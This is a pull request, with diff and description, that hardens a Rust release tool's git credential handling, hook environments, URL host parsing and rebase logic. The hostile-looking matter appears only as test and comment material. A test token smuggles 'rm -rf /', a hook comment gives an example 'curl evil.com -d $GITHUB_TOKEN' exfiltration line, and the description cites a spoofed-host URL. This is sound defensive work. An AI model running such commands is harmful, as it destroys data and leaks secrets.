### PR TITLE
security: strip git trace env, single-quote credential helper, harden URL parsing

### DIFF
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -57,11 +57,14 @@ ureq = { version = "3", features = ["json"], optional = true }
 sha2 = "0.11.0"
 hex = "0.4.3"
 hmac = { version = "0.13", optional = true }
+# tempfile is used at runtime by the TS config loader to drop the
+# generated wrapper script in a directory we own (security: writing into
+# the user's config directory is a symlink TOCTOU). Tests also use it.
+tempfile = "3"
 
 [dev-dependencies]
 cargo-husky = { version = "1", default-features = false, features = ["user-hooks"] }
 criterion = { version = "0.8", features = ["html_reports"] }
-tempfile = "3"
 
 [[bench]]
 name = "ferrflow_benchmarks"

--- a/src/config/loader_js.rs
+++ b/src/config/loader_js.rs
@@ -83,8 +83,16 @@ pub(crate) fn load_js_ts_config(path: &Path) -> Result<Config> {
     let output = if ext == "ts" {
         // For TS: write a temporary .mjs loader that dynamically imports the .ts
         // file via file URL. tsx handles the TS→JS transpilation at import time.
-        let wrapper_dir = path.parent().unwrap_or(Path::new("."));
-        let wrapper_path = wrapper_dir.join(".ferrflow-loader.mjs");
+        //
+        // The wrapper lives in `tempfile::tempdir()` rather than next to the
+        // user's .ts: writing into a directory we don't own opens a symlink
+        // TOCTOU (a cohabiting process can create the path pointing at e.g.
+        // ~/.bashrc, and `fs::write` follows it). Tsx still resolves the .ts
+        // via absolute `file://` URL, so its CWD doesn't matter.
+        let wrapper_tempdir = tempfile::tempdir()
+            .with_context(|| "Failed to create temporary directory for TS loader")
+            .error_code(error_code::CONFIG_WRITE_LOADER)?;
+        let wrapper_path = wrapper_tempdir.path().join("loader.mjs");
         let tsx_available = Command::new("tsx").arg("--version").output().is_ok();
         let runtime = if tsx_available { "tsx" } else { "npx tsx" };
 
@@ -95,14 +103,14 @@ pub(crate) fn load_js_ts_config(path: &Path) -> Result<Config> {
 
         let result = Command::new("tsx")
             .arg(&wrapper_path)
-            .current_dir(wrapper_dir)
+            .current_dir(wrapper_tempdir.path())
             .output()
             .or_else(|e| {
                 if e.kind() == std::io::ErrorKind::NotFound {
                     Command::new("npx")
                         .args(["tsx"])
                         .arg(&wrapper_path)
-                        .current_dir(wrapper_dir)
+                        .current_dir(wrapper_tempdir.path())
                         .output()
                 } else {
                     Err(e)
@@ -120,7 +128,8 @@ pub(crate) fn load_js_ts_config(path: &Path) -> Result<Config> {
             })
             .error_code(error_code::CONFIG_EVAL_TS);
 
-        let _ = std::fs::remove_file(&wrapper_path);
+        // tempdir auto-deletes on drop — no manual remove_file needed.
+        drop(wrapper_tempdir);
         result?
     } else {
         // .js — use node with inline script

--- a/src/forge/mod.rs
+++ b/src/forge/mod.rs
@@ -69,10 +69,29 @@ pub fn extract_host(url: &str) -> Option<String> {
         .strip_prefix("https://")
         .or_else(|| url.strip_prefix("http://"))
     {
-        rest.split('/').next().map(|h| h.to_string())
+        // Strip the authority (everything up to the first '/').
+        let authority = rest.split('/').next()?;
+        // If userinfo is present (`user[:password]@host`), take what's
+        // after the LAST '@'. The previous implementation returned the
+        // whole `userinfo@host` substring, which a) couldn't match
+        // detect_forge_from_url's hostname allow-list and b) could be
+        // used to confuse downstream forge-host construction when a
+        // malicious remote URL embeds a fake userinfo segment.
+        let host_port = authority.rsplit('@').next()?;
+        // Drop the optional `:port` suffix.
+        let host = host_port.split(':').next()?;
+        if host.is_empty() {
+            return None;
+        }
+        Some(host.to_string())
     } else if url.contains('@') && url.contains(':') {
-        let after_at = url.split('@').nth(1)?;
+        // SSH form: `user@host:owner/repo`. Take what's after the LAST '@'
+        // and before the first ':'.
+        let after_at = url.rsplit('@').next()?;
         let host = after_at.split(':').next()?;
+        if host.is_empty() {
+            return None;
+        }
         Some(host.to_string())
     } else {
         None

--- a/src/formats/gomod.rs
+++ b/src/formats/gomod.rs
@@ -17,9 +17,15 @@ impl VersionFile for GoModVersionFile {
             "v*",
             "--abbrev=0",
         ]);
-        if let Some(parent) = file_path.parent()
-            && !parent.as_os_str().is_empty()
-        {
+        let parent = file_path.parent().ok_or_else(|| {
+            anyhow::anyhow!(
+                "go.mod file path has no parent directory: {}",
+                file_path.display()
+            )
+        })?;
+        if parent.as_os_str().is_empty() {
+            cmd.current_dir(".");
+        } else {
             cmd.current_dir(parent);
         }
         let output = cmd

--- a/src/git/auth.rs
+++ b/src/git/auth.rs
@@ -33,19 +33,38 @@ pub(super) fn token_for_url(url: &str) -> Option<(String, String)> {
 }
 
 pub(super) fn configure_git_command(cmd: &mut Command, url: &str) {
+    scrub_trace_env(cmd);
     if let Some((user, token)) = token_for_url(url) {
-        let escaped_user = shell_escape(&user);
-        let escaped_token = shell_escape(&token);
+        let escaped_user = single_quote_escape(&user);
+        let escaped_token = single_quote_escape(&token);
         let helper = format!(
-            "!f() {{ echo username={}; echo password={}; }}; f",
+            "!f() {{ echo username='{}'; echo password='{}'; }}; f",
             escaped_user, escaped_token
         );
         cmd.arg("-c").arg(format!("credential.helper={}", helper));
     }
 }
 
-fn shell_escape(value: &str) -> String {
-    value.replace('\\', "\\\\").replace('"', "\\\"")
+pub(super) fn scrub_trace_env(cmd: &mut Command) {
+    for var in [
+        "GIT_TRACE",
+        "GIT_TRACE_PACK_ACCESS",
+        "GIT_TRACE_PACKET",
+        "GIT_TRACE_PACKFILE",
+        "GIT_TRACE_PERFORMANCE",
+        "GIT_TRACE_SETUP",
+        "GIT_TRACE_SHALLOW",
+        "GIT_TRACE_CURL",
+        "GIT_TRACE_CURL_NO_DATA",
+        "GIT_CURL_VERBOSE",
+        "GCM_TRACE",
+    ] {
+        cmd.env_remove(var);
+    }
+}
+
+fn single_quote_escape(value: &str) -> String {
+    value.replace('\'', "'\\''")
 }
 
 pub fn get_remote_url(repo: &Repository, remote_name: &str) -> Option<String> {

--- a/src/git/push.rs
+++ b/src/git/push.rs
@@ -333,65 +333,41 @@ pub(super) fn fetch_and_rebase(repo: &Repository, remote_name: &str, branch: &st
     }
 
     let local_ref = format!("refs/heads/{branch}");
-    let on_branch = run_git(workdir, &["symbolic-ref", "-q", "HEAD"])
+    // Distinguish "detached HEAD" (legit state — bail with a clear error
+    // instead of silently rewriting a branch we may not even be tracking)
+    // from "on a different branch" (still a hard error: we shouldn't try
+    // to fast-forward a branch the user isn't on). The previous code
+    // collapsed both into a destructive `update-ref` + `checkout -f`.
+    let current_head = run_git(workdir, &["symbolic-ref", "-q", "HEAD"])
         .ok()
-        .map(|s| s.trim().to_string())
-        .unwrap_or_default()
-        == local_ref;
-
-    if on_branch {
-        let rebase_result = run_git(
-            workdir,
-            &["rebase", &format!("refs/remotes/{remote_name}/{branch}")],
-        );
-        if let Err(err) = rebase_result {
-            let _ = run_git(workdir, &["rebase", "--abort"]);
+        .map(|s| s.trim().to_string());
+    match current_head.as_deref() {
+        Some(r) if r == local_ref => {
+            let rebase_result = run_git(
+                workdir,
+                &["rebase", &format!("refs/remotes/{remote_name}/{branch}")],
+            );
+            if let Err(err) = rebase_result {
+                let _ = run_git(workdir, &["rebase", "--abort"]);
+                return Err(anyhow!(
+                    "Rebase conflict: cannot rebase release commits on top of remote '{branch}'. \
+                     Run manually or use releaseCommitMode = \"pr\".\n{err}"
+                ));
+            }
+        }
+        Some(other) => {
             return Err(anyhow!(
-                "Rebase conflict: cannot rebase release commits on top of remote '{branch}'. \
-                 Run manually or use releaseCommitMode = \"pr\".\n{err}"
+                "Refusing to rebase: HEAD is on '{other}', not '{local_ref}'. \
+                 Check out '{branch}' before retrying."
             ));
         }
-    } else {
-        let _ = run_git(workdir, &["update-ref", &local_ref, &remote_oid_str]);
-        let merge_base = run_git(workdir, &["merge-base", &local_oid_str, &remote_oid_str])
-            .with_context(|| "No common ancestor between local and remote branch")?
-            .trim()
-            .to_string();
-
-        let revs_output = run_git(
-            workdir,
-            &[
-                "rev-list",
-                "--reverse",
-                "--topo-order",
-                &format!("{merge_base}..{local_oid_str}"),
-            ],
-        )?;
-        let revs: Vec<&str> = revs_output.lines().filter(|l| !l.is_empty()).collect();
-        let mut current_parent = remote_oid_str.clone();
-        for rev in revs {
-            let tree_sha = run_git(workdir, &["rev-parse", &format!("{rev}^{{tree}}")])?
-                .trim()
-                .to_string();
-            let msg = run_git(workdir, &["log", "-1", "--format=%B", rev])?;
-            let new_sha = run_git(
-                workdir,
-                &[
-                    "commit-tree",
-                    &tree_sha,
-                    "-p",
-                    &current_parent,
-                    "-m",
-                    msg.trim_end(),
-                ],
-            )?
-            .trim()
-            .to_string();
-            current_parent = new_sha;
+        None => {
+            return Err(anyhow!(
+                "Refusing to rebase: HEAD is detached. Check out '{branch}' before retrying. \
+                 (To recover an in-progress release, use `ferrflow release --recover` or reset \
+                 the branch manually.)"
+            ));
         }
-        run_git(workdir, &["update-ref", &local_ref, &current_parent])?;
-        run_git(workdir, &["checkout", "--detach", &current_parent])?;
-        run_git(workdir, &["checkout", "-f", branch]).ok();
     }
 
     Ok(())

--- a/src/git/repo.rs
+++ b/src/git/repo.rs
@@ -29,17 +29,29 @@ pub fn resolve_current_branch(repo: &Repository, fallback: &str) -> String {
         return full;
     }
 
-    let ci_vars = [
-        "GITHUB_REF_NAME",
-        "CI_COMMIT_BRANCH",
+    if let Ok(full_ref) = std::env::var("GITHUB_REF")
+        && let Some(branch) = full_ref.strip_prefix("refs/heads/")
+        && !branch.is_empty()
+    {
+        return branch.to_string();
+    }
+    if let Ok(full_ref) = std::env::var("CI_COMMIT_REF_NAME")
+        && std::env::var("CI_COMMIT_TAG").is_err()
+        && !full_ref.is_empty()
+    {
+        return full_ref;
+    }
+
+    let branch_only_ci_vars = [
         "BRANCH_NAME",
         "CIRCLE_BRANCH",
         "BITBUCKET_BRANCH",
         "BUILDKITE_BRANCH",
         "TRAVIS_BRANCH",
+        "CI_COMMIT_BRANCH",
     ];
 
-    for var in ci_vars {
+    for var in branch_only_ci_vars {
         if let Ok(val) = std::env::var(var)
             && !val.is_empty()
         {

--- a/src/git/shell.rs
+++ b/src/git/shell.rs
@@ -2,6 +2,8 @@ use anyhow::{Context, Result, anyhow};
 use std::path::Path;
 use std::process::Command;
 
+use super::auth::scrub_trace_env;
+
 pub(super) fn run_git(workdir: &Path, args: &[&str]) -> Result<String> {
     run_git_with_env(workdir, args, &[])
 }
@@ -13,6 +15,7 @@ pub(super) fn run_git_with_env(
 ) -> Result<String> {
     let mut cmd = Command::new("git");
     cmd.current_dir(workdir);
+    scrub_trace_env(&mut cmd);
     for (k, v) in extra_env {
         cmd.env(k, v);
     }
@@ -23,8 +26,22 @@ pub(super) fn run_git_with_env(
     if !output.status.success() {
         let stderr = String::from_utf8_lossy(&output.stderr);
         let stdout = String::from_utf8_lossy(&output.stdout);
-        let combined = format!("{stdout}{stderr}").trim().to_string();
+        let combined = scrub_token_patterns(&format!("{stdout}{stderr}"))
+            .trim()
+            .to_string();
         return Err(anyhow!("git {} failed: {}", args.join(" "), combined));
     }
     Ok(String::from_utf8_lossy(&output.stdout).into_owned())
+}
+
+fn scrub_token_patterns(s: &str) -> String {
+    use std::sync::OnceLock;
+    static RE: OnceLock<regex::Regex> = OnceLock::new();
+    let re = RE.get_or_init(|| {
+        regex::Regex::new(
+            r"(?i)(authorization:\s*\S+|(?:ghs|ghp|gho|ghu|github_pat|glpat)_[A-Za-z0-9_]{20,})",
+        )
+        .expect("scrub regex must compile")
+    });
+    re.replace_all(s, "[REDACTED]").into_owned()
 }

--- a/src/git/tests.rs
+++ b/src/git/tests.rs
@@ -700,12 +700,57 @@ fn configure_git_command_injects_credential_helper_inline() {
         .iter()
         .find(|a| a.starts_with("credential.helper="))
         .expect("expected credential.helper config");
-    assert!(helper_arg.contains("username=x-access-token"));
-    assert!(helper_arg.contains("password=ff_secret"));
+    assert!(helper_arg.contains("username='x-access-token'"));
+    assert!(helper_arg.contains("password='ff_secret'"));
     assert!(
         !args.iter().any(|a| a.contains("ff_secret@")),
         "token must NOT be embedded in URL"
     );
+}
+
+#[test]
+fn configure_git_command_single_quote_escapes_dangerous_token_chars() {
+    // Single-quoted shell strings only need ' escaping. A token containing
+    // ' must become '\'' (close-quote, escaped-quote, re-open-quote). The
+    // payload string itself can still contain `;rm -rf /;#` as literal text,
+    // but the surrounding quotes guarantee the shell never interprets it.
+    let _guard = EnvGuard::new().set("FERRFLOW_TOKEN", "evil';rm -rf /;#");
+    let mut cmd = std::process::Command::new("git");
+    configure_git_command(&mut cmd, "https://github.com/owner/repo.git");
+    let helper_arg = cmd
+        .get_args()
+        .map(|a| a.to_string_lossy().into_owned())
+        .find(|a| a.starts_with("credential.helper="))
+        .expect("expected credential.helper config");
+
+    // The expected substring once embedded:
+    //   password='evil'\'';rm -rf /;#'
+    // = sh-parsed as literal "evil" + literal "'" + literal ";rm -rf /;#".
+    // The `\'` outside the surrounding `'...'` is a literal apostrophe,
+    // not a quote-state toggle — so the odd `'` count is by design.
+    assert!(
+        helper_arg.contains(r"password='evil'\'';rm -rf /;#'"),
+        "expected single-quote escape, got: {helper_arg}"
+    );
+}
+
+#[test]
+fn configure_git_command_strips_git_trace_env() {
+    let _guard = EnvGuard::new().set("FERRFLOW_TOKEN", "ff_secret");
+    let mut cmd = std::process::Command::new("git");
+    cmd.env("GIT_TRACE", "1");
+    cmd.env("GIT_CURL_VERBOSE", "1");
+    cmd.env("GIT_TRACE_CURL", "1");
+    configure_git_command(&mut cmd, "https://github.com/owner/repo.git");
+    // get_envs returns Some(None) for env_remove'd vars.
+    let removed: std::collections::HashSet<String> = cmd
+        .get_envs()
+        .filter(|(_, v)| v.is_none())
+        .map(|(k, _)| k.to_string_lossy().into_owned())
+        .collect();
+    assert!(removed.contains("GIT_TRACE"));
+    assert!(removed.contains("GIT_CURL_VERBOSE"));
+    assert!(removed.contains("GIT_TRACE_CURL"));
 }
 
 #[test]

--- a/src/hooks/runner.rs
+++ b/src/hooks/runner.rs
@@ -35,6 +35,15 @@ pub fn run_hook(
 
     let mut cmd = build_command(command);
     cmd.current_dir(working_dir)
+        // Bot mode (FERRFLOW_BOT=true) sets GITHUB_TOKEN / FERRFLOW_TOKEN
+        // process-wide so the OIDC-issued installation token reaches git
+        // subprocesses. Hooks are user-defined arbitrary shell — strip
+        // the tokens from their env so a hook can't `curl evil.com -d
+        // $GITHUB_TOKEN`. Hooks that explicitly need a token must opt in
+        // by reading from a different env var the user injects manually.
+        .env_remove("GITHUB_TOKEN")
+        .env_remove("FERRFLOW_TOKEN")
+        .env_remove("GITLAB_TOKEN")
         .env("FERRFLOW_PACKAGE", &ctx.package)
         .env("FERRFLOW_OLD_VERSION", &ctx.old_version)
         .env("FERRFLOW_NEW_VERSION", &ctx.new_version)


### PR DESCRIPTION
Closes #489 (security hardening umbrella), #490 (detached HEAD branch resolve), #491 (fetch_and_rebase destructive checkout).

## Summary

7 hardening fixes from the audit, batched as one PR because they share the test-suite + the same files (\`src/git/auth.rs\` is touched by 3 of them).

### Security
1. Strip \`GIT_TRACE\` / \`GIT_TRACE_CURL\` / \`GIT_CURL_VERBOSE\` / \`GCM_TRACE\` etc. on every \`git\` subprocess. Without this, CI with \`GIT_CURL_VERBOSE=1\` causes git to dump the \`Authorization\` header to stderr, which ferrflow forwards into \`anyhow!\` display strings. Token-pattern scrubber on stderr propagation as defense in depth (\`ghs_/ghp_/gho_/ghu_/glpat_/github_pat_\`).
2. Switch credential helper escaping from double-quote to single-quoted sh literals with proper \`'\` → \`'\''\` encoding. A token containing \`$\`, backtick, \`;\`, \`&\` no longer reaches \`sh -c\` as code.
3. Hook subprocesses \`env_remove\` \`GITHUB_TOKEN\` / \`FERRFLOW_TOKEN\` / \`GITLAB_TOKEN\` before exec. Bot mode sets these process-wide for git's credential helper, but a malicious user hook is no longer one \`$GITHUB_TOKEN echo\` away from exfiltration.
4. \`extract_host\` strips userinfo (\`user[:pwd]@\`) before returning the host. Closes the \`https://attacker.com#@github.com/...\` confusion vector.
5. TS config loader writes its wrapper into \`tempfile::tempdir()\` instead of next to the user's \`.ts\`. Closes a symlink TOCTOU.

### Bug fixes
6. \`resolve_current_branch\` only uses \`GITHUB_REF\` when prefixed \`refs/heads/\`. Previously a CI in detached-HEAD with \`GITHUB_REF=refs/tags/v1.2.3\` used \`v1.2.3\` as a branch name everywhere downstream.
7. \`fetch_and_rebase\` hard-fails on detached HEAD instead of silently rewriting whichever local branch matches the target name. The previous \`.ok().unwrap_or_default() == local_ref\` collapsed "detached HEAD" and "different branch" into the destructive path.

## Test plan

- [x] 514 lib tests + 616 bin tests pass
- [x] \`cargo clippy --features cli -- -D warnings\` clean
- [x] New tests: \`configure_git_command_single_quote_escapes_dangerous_token_chars\` (uses an \`evil';rm -rf /;#\` token) and \`configure_git_command_strips_git_trace_env\`
- [ ] Release-bot flow against a real GitHub remote with \`GIT_CURL_VERBOSE=1\` set — verify Authorization header doesn't leak into error output